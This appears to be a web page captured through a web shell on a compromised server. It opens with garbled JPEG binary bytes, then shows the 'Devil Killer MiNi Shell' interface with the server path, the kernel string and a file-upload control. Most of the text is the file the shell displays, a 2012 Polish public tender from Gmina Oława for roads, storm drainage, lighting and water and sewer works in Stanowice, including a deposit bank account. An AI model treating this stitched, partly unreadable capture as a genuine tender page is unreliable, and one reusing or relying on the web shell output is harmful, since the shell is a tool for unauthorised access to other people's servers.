JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120725/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120725/162345-N-2012.html

<p class="kh_header"><b>Oława: WYBUDOWANIE KANALIZACJI DESZCZOWEJ, DROGI Z OBUSTRONNYMI CHODNIKAMI I OŚWIETLENIEM ULICZNYM NA UL. KLONOWEJ, BRZOZOWEJ, OGRODOWEJ, IRYSOWEJ, GAJOWEJ W MIEJSCOWOŚCI STANOWICE GMINA OŁAWA</b><br>
<b>Numer ogłoszenia: 162345 - 2012; data zamieszczenia: 25.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Oława , pl. Marsz. Józefa Piłsudskiego 28, 55-200 Oława, woj. dolnośląskie, tel. 71 3133044, faks 71 3130199.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.gminaolawa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYBUDOWANIE KANALIZACJI DESZCZOWEJ, DROGI Z OBUSTRONNYMI CHODNIKAMI I OŚWIETLENIEM ULICZNYM NA UL. KLONOWEJ, BRZOZOWEJ, OGRODOWEJ, IRYSOWEJ, GAJOWEJ W MIEJSCOWOŚCI STANOWICE GMINA OŁAWA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest ,,Wybudowanie kanalizacji deszczowej, drogi z obustronnymi chodnikami i oświetleniem ulicznym na ul. Klonowej, Brzozowej, Ogrodowej, Irysowej, Gajowej w miejscowości Stanowice Gmina Oława.

Przedmiot zamówienia obejmuje:
a) ETAP   I
Kanalizacja deszczowa.
Kanalizacja deszczowa z przykanalikami i wpustami ulicznymi do odprowadzenia wód z ulicy Irysowej  przez ul Fiołkową do istniejącego rowu. Wykonanie wylotu i przebudowy rowu. Kolektor z rur WIPRO lub WITROS (żelbetowe) przykanaliki z rur betonowych. Studnie betonowe.
Odcinki:
od studni SDI-10 do SDF-9, o0,30 m długość 260m,
od studni SDF-10 do SDF-9, o0,60 m długość 12m,
od studni SDF-9 do W-1, o0,80 m długość 480,5m,
przebudowa rowu 247,5 m.
Droga z chodnikami.
Kategoria drogi KR-3 ulica Irysowa do skrzyżowania z ul. Fiołkową łącznie ze skrzyżowaniem. Szerokość jezdni 6 m z obustronnymi chodnikami po 2 m szerokości. Nawierzchnia z kostki betonowej gr 8 cm jezdnia i 6 cm chodniki na podbudowie z kruszywa i obustronnym drenem w oplocie. Długość  drogi 288 m ze skrzyżowaniem z ul. Fiołkową.
Oświetlenie uliczne.
Oświetlenie uliczne w ul. Irysowej  do skrzyżowania z ul. Fiołkową. Linie kablowe YAKXS 4x25mm2. Długości 270m 6 słupów wysokości 6 m z oprawami oświetleniowymi, lampy sodowe. Równolegle układana bednarka stalowa 30x4 mm.
Sieć energetyczna nn.
Element projektu polegający na ułożeniu rury osłonowej Arot z linką o 160 mm długości 110 mb ułożonej we wspólnym wykopie obok kabla zasilającego przepompownię P-1. Odcinki rur osłonowych z linką DVK fi 130 mm o długości 2x15 m, 2x11 m oraz fi 70 mm o długości 11m zlokalizowane w obrębie skrzyżowania ulic Irysowej i Gajowej.

Sieć wodociągowa.
Odcinek sieci wodociągowej z rur PE100 SDR17 o110 mm od węzła 38 (wpięcie do istniejącej sieci wodociągowej z rur PVC o110 mm w ul. Zielonej) do węzła hydrantowego 36 o długości 176 mb oraz odcinek sieci wodociągowej z rur PE100 SDR17 o110 mm od węzła 35 do węzła hydrantowego 33 o długości 26,5 mb. Hydranty nadziemne DN80 (nr 5 i 6) - 2 szt. Rurociąg bezpośrednio za węzłem 36 w kierunku węzła 37 i za węzłem 33 w kierunku węzła 32 należy zaślepić w sposób umożliwiający późniejszą rozbudowę. Próba szczelności, dezynfekcja i płukanie rurociągu. Badanie bakteriologiczne wody oraz pomiar wydajności i ciśnienia hydrantów.
Sieć kanalizacji sanitarnej.
Wykonanie dla zaprojektowanej przepompowni P-1:
- rurociągu tłocznego o63 PE100 SDR17 61,0 mb i o125 PE100 SDR17 - 10,0 mb z włączeniem do istniejącej studni betonowej a drugi koniec zaślepić. Wykonanie płukania rurociągu; badania  szczelności i próby ciśnieniowej.
- kabla elektroenergetycznego na napięcie 0,6/1 kV  YKY 4x16mm2 - ok.145 m wraz z bednarką, rurami ochronnymi Arot KR-110 na przejściach pod drogami - razem ok. 20,0 m. Należy wykonać niezbędne badania  zgodnie z obowiązującymi normami.
b)         ETAP   II
Kanalizacja deszczowa.
Kanalizacja deszczowa z przykanalikami i wpustami ulicznymi w ul. Ogrodowej od studni SDF-21 do włączenia do studni w ul. Irysowej SDF-10, łącznie z odcinkiem SDF-12-1 przez SDF-12 do SDM-1 w ul. Malinowej. Kolektor z rur WIPRO lub WITROS (żelbetowe) przykanaliki z rur betonowych. Studnie betonowe.
Odcinki:
od studni SDF-10 do SDF-12  o 0,60 m, długość 87,5m,
od studni SDF-12 do SDF-20,  o 0,50 m, długość 338,5m,
od studni SDF-20 do SDF-21,  o 0,30 m, długość 16m,
od studni SDF-12-1  do SDF-12,  o 0,30 m, długość 10,5m,
od studni SDM-1 do SDF-12,  o 0,40 m, długość 46m,
Droga z chodnikami.
Kategoria drogi KR-3 odcinek ul Ogrodowej od skrzyżowania z ul. Jarzębinowej (wraz ze skrzyżowaniem) do skrzyżowania z ul. Fiołkową. Parametry i konstrukcja jak w etapie I.
Długość drogi 449 m ze skrzyżowaniem z ul. Malinową.
Oświetlenie uliczne.
Oświetlenie odcinka drogi: dokończenie obwodu nr 2 - 14 słupów, długość sieci 550m łącznie z szafką pomiarową ZP-1 i oświetleniową SOU oraz wyjście kablem dł. 230m z szafki jako obwód  nr1 do miejsca ustawienia słupa oświetleniowego 1/1. Równolegle układana bednarka stalowa 30x4 mm.
Sieć energetyczna
W poboczu drogi należy wkopać trzy odcinki rur Arota z linką o160 jako przepust na kabel energetyczny sieci wykonywanej w późniejszym terminie. Długość odcinków przepustu  DVR: 70m, 65m, 80m pod chodnikiem oraz DVK  20m w jezdni.
c)      ETAP   III
Kanalizacja deszczowa.
Kanalizacja deszczowa z przykanalikami i wpustami ulicznymi w ul. Brzozowej od studni SDF-24 do włączenia do studni SDF-21 oraz od studni nr SDW-15 w ul Brzozowej do istniejącej studni SDW-1. Kolektor z rur WIPRO lub WITROS (żelbetowe) przykanaliki z rur betonowych. Studnie betonowe.
Odcinki:
od studni SDF-24 do SDF-21, o 0,30 m długość 142m,
od studni SDW-15 do SDW-9, o 0,30 m długość 224,5m,
od studni SDW9 do SDW-6, o 0,50 m długość 65,5m,
od studni SDW-6  do SDW-4,  przecisk sterowany o 0,50 m długość 131m,
od studni SDW-4 do SDW-1, o 0,50 m długość 161,5m.
Droga z chodnikami.
Kategoria drogi KR-3 ul. Brzozowa od skrzyżowania z ul. Jarzębinową do istniejącej nawierzchni bitumicznej. Parametry i konstrukcja jak w etapie I.
Długość drogi 547 m.
Oświetlenie uliczne.
Oświetlenie odcinka drogi: dokończenie obwodu nr 1 - 16 słupów, długość sieci 530m. Równolegle układana bednarka stalowa 30x4 mm.
Sieć energetyczna.
Na skrzyżowaniu ul. Brzozowej z ul. Modrzewiową wbudować przepust z rur Arota z linką na kabel energetyczny sieci wykonywanej w późniejszym terminie, typ DVK  30m.


Etapowanie wprowadzono w celu określenia kolejności wykonania i odbioru robót.

Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja projektowa, specyfikacje techniczne wykonania i odbioru robót dla zadań:
1. Kanalizacja deszczowa - odwodnienie ulic Klonowa, Brzozowa, Ogrodowa, Irysowa, Gajowa w m. Stanowice, gmina Oława - Decyzja Nr 217/2012 Starosty Oławskiego o pozwoleniu na budowę z dnia 21.03.2012 r. znak sprawy AB.6740.9.7.2012 oraz Postanowienie Nr 94/2012 z dnia 22.03.2012 r. znak AB.6740.9.7.2012,
2. Budowa ulic Klonowa, Brzozowa, Ogrodowa, Irysowa wraz z chodnikami i oświetleniem ulicznym w m. Stanowice, gmina Oława - Decyzja Nr 270/2012 Starosty Oławskiego o pozwoleniu na budowę z dnia 04.04.2012 r. znak sprawy AB.6740.11.2.2012,
3. Rozbudowa sieci wodociągowej w m. Stanowice, Marcinkowice, Godzikowice, Jaczkowice, Zabardowice, Godzinowice, gmina Oława - Decyzja Nr 357/2012 Starosty Oławskiego o pozwoleniu na budowę z dnia 09.05.2012 r. znak sprawy AB.6740.9.18.2012 oraz Postanowienie Nr 201/2012 z dnia 04.06.2012 r. znak AB.6740.9.18.2012, w części określonej powyżej - ETAP I Sieć wodociągowa,
4. Rozbudowa sieci kanalizacji sanitarnej w m. Stanowice i Marcinkowice, gmina Oława - Decyzja Nr 218/2012 Starosty Oławskiego o pozwoleniu na budowę z dnia 21.03.2012 r. znak sprawy AB.6740.9.9.2012 oraz Postanowienie Nr 93/2012 z dnia 22.03.2012 r. znak AB.6740.9.9.2012, w części określonej powyżej - ETAP I Sieć kanalizacji sanitarnej.

Ponadto przedmiot zamówienia obejmuje dla wszystkich etapów:
- ubezpieczenie placu budowy,
- zabezpieczenie terenu wokół obiektu na czas trwania robót,
- przywrócenie terenu wokół obiektu do stanu pierwotnego,
- odszkodowania wynikłe w trakcie prowadzenia robót,
- naprawę uszkodzonych w czasie robót urządzeń melioracyjnych,
- koszty związane z wykonaniem wszelkich prób i badań wynikających z norm i specyfikacji technicznych wykonania i odbioru robót,
- opłaty za wodę i odpady,
- wykonanie badania ciągłości żył przewodu do przepompowni i rezystancji izolacji,
- wszelkie koszty związane z odbiorami robót przez odpowiednie służby i właścicieli istniejących sieci i rowów,
- uzyskanie wszelkich niezbędnych dokumentów związanych z przekazaniem do użytkowania wraz z dokumentacją powykonawczą - operat kolaudacyjny,
- prowadzenie bieżącej obsługi geodezyjnej i wykonanie inwentaryzacji powykonawczej,
- zapewnienie właściwych warunków bezpieczeństwa i higieny pracy, opracowanie planu BIOZ,
- zapewnienie stałego porządku i czystości na placu budowy,
- wszelkie koszty związane z zajęciem pasa drogowego oraz organizacją ruchu,
- koszty odwodnienia wykopów, zarówno z dna wykopów jak i za pomocą igłofiltrów.


Szczegółowy opis przedmiotu zamówienia przedstawiają dokumentacje projektowe (wraz z przedmiarami robót) oraz specyfikacje techniczne wykonania i odbioru robót budowlanych. 

Użyte w dokumentacji projektowej nazwy materiałów i urządzeń nie są obowiązujące i należy je traktować, jako propozycje projektanta. Wykonawca może zastosować materiały i urządzenia równoważne o parametrach techniczno - użytkowych odpowiadających co najmniej parametrom materiałów i urządzeń zaproponowanych w dokumentacji projektowej, a doprecyzowanych w STWiORB. Udowodnienie równoważności należy do wykonawcy, który zobowiązany jest do zaznaczenia tego w ofercie, wraz z załączeniem wykazu materiałów lub urządzeń równoważnych, kart katalogowych lub innych dokumentów potwierdzających parametry techniczne równoważnych materiałów lub urządzeń. Jeżeli zastosowanie rozwiązań równoważnych wymagać będzie zmian w projekcie, Wykonawca dokona ich na własny koszt wraz z uzyskaniem niezbędnych uzgodnień i pozwoleń. Zastosowane materiały lub urządzenia równoważne nie mogą posiadać gorszych parametrów/wymogów niż te określone w dokumentacji projektowej oraz STWiORB. 
Jeżeli wykonawca nie złoży wraz z ofertą wykazu rozwiązań równoważnych, to znaczy, że będzie realizował zamówienie zgodnie z dokumentacją techniczną.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w przypadku wystąpienia okoliczności, o których mowa w art. 67 ust.1 pkt 6 ustawy Prawo zamówień publicznych. Przedmiot zamówień będzie zgodny z przedmiotem zamówienia podstawowego i nie przekroczy 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.23.21.30-2, 45.24.72.20-8, 45.23.30.00-9, 45.23.32.22-1, 45.23.14.00-9, 45.23.21.50-8, 45.23.13.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium na etapie składania ofert w wysokości 20 000,00 PLN (dwadzieścia tysięcy złotych ) w formach określonych w art. 45 ust. 6 ustawy Prawo zamówień publicznych tj.:
a) pieniądzu;
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że
zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;
c) gwarancjach bankowych;
d) gwarancjach ubezpieczeniowych;
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada
2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Z 2007 r. Nr 42, poz. 275, ze zm.).
2. W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja ma być co najmniej
gwarancją: bezwarunkową, nieprzenośną, nieodwołalną i płatną na pierwsze pisemne żądanie Zamawiającego.
3. Gwarancja ma być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
a) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub
instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,
b) oznaczenie postępowania,
c) określenie przedmiotu postępowania
d) określenie wierzytelności, która ma być zabezpieczona gwarancją,
e) kwotę gwarancji,
f) termin ważności gwarancji
g) zobowiązanie gwaranta do zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż: Wykonawca, którego ofertę wybrano: 1) odmówił podpisania umowy na warunkach określonych we ofercie, lub 2) nie wniósł zabezpieczenia należytego wykonania umowy, lub 3) zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy lub 4) wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego
stronie.
4. Wadium wnoszone w pieniądzu ( PLN) należy wpłacić na następujący rachunek Zamawiającego:
2295850007 0010 0003 4340 0038.
Na przelewie powinien być umieszczony tytuł: Drogi Stanowice.
Kopię przelewu zaleca się dołączyć do oferty.
5. Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za
pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert.
6. W przypadku wadium wnoszonego w innych dopuszczonych przez Pzp formach należy złożyć oryginał dokumentu w kasie Zamawiającego (pok. nr 14), a kopię z potwierdzeniem złożenia w kasie Wykonawca może
dołączyć do oferty.
7. Zamawiający dopuszcza również dołączenie oryginału dokumentu wadium bezpośrednio do oferty</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną robotę budowlaną polegającą na ułożeniu nawierzchni z betonowej kostki brukowej o powierzchni co najmniej 6000 m2 i wykonaniu co najmniej  500 mb sieci kanalizacji deszczowej lub sanitarnej. Zamawiający uzna również warunek za spełniony w sytuacji wykonania dwóch robór budowlanych obejmujących w jednej ułożenie kostki betonowej i drugiej wybudowanie kanalizacji.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tj. dysponowanie: 1) kierownikiem budowy posiadającym aktualne uprawnienia budowlane w specjalności konstrukcyjno - budowlanej lub drogowej bez ograniczeń, lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów;  który jest wpisany na listę członków właściwej izby samorządu zawodowego. 2) kierownikiem robót elektrycznych  posiadającym aktualne uprawnienia budowlane do kierowania    robotami elektrycznymi w specjalności instalacyjnej w zakresie instalacji elektrycznych bez ograniczeń lub odpowiadające  im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących  przepisów, który jest wpisany na listę członków właściwej izby samorządu zawodowego. 3) kierownikiem robót sanitarnych posiadającym aktualne uprawnienia budowlane do kierowania robotami instalacyjnymi  w zakresie sieci cieplnych, gazowych, wodociagowych i kanalizacyjnych bez ograniczeń, lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane 
na podstawie wcześniej obowiązujących  przepisów, który jest wpisany na listę członków właściwej izby samorządu zawodowego. Zamawiający dopuszcza połączenie wyżej wskazanych funkcji pod warunkiem spełnienia przez    
osobę łączącą te funkcje wszystkich warunków wymaganych dla poszczególnych funkcji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że:
a) posiada środki finansowe lub zdolności kredytowe o łącznej kwocie w wysokości co najmniej 2.500.000,00 zł.;
b) posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z wykonaniem niniejszego zamówienia, potwierdzone polisą lub innym dokumentem ubezpieczenia na kwotę co najmniej  1 000 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

